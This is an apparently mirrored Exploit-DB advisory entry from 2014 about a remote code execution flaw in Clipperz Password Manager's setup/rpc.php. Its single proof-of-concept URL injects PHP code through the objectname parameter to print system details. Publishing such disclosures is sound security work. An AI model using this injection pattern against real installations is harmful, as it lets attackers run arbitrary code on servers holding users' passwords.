Clipperz Password Manager – ‘/backend/PHP/src/setup/rpc.php’ Remote Code Execution - 体验盒子

作者： Manish Tanwar

日期： 2014-05-20

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/39191/

source: https://www.securityfocus.com/bid/67498/info

Clipperz Password Manager is prone to remote code-execution vulnerability.

Attackers can exploit this issue to execute arbitrary code in the context of the affected application. 

http://www.example.com/password-manager-master/backend/php/src/setup/rpc.php?objectname=Xmenu();print_r(php_uname());die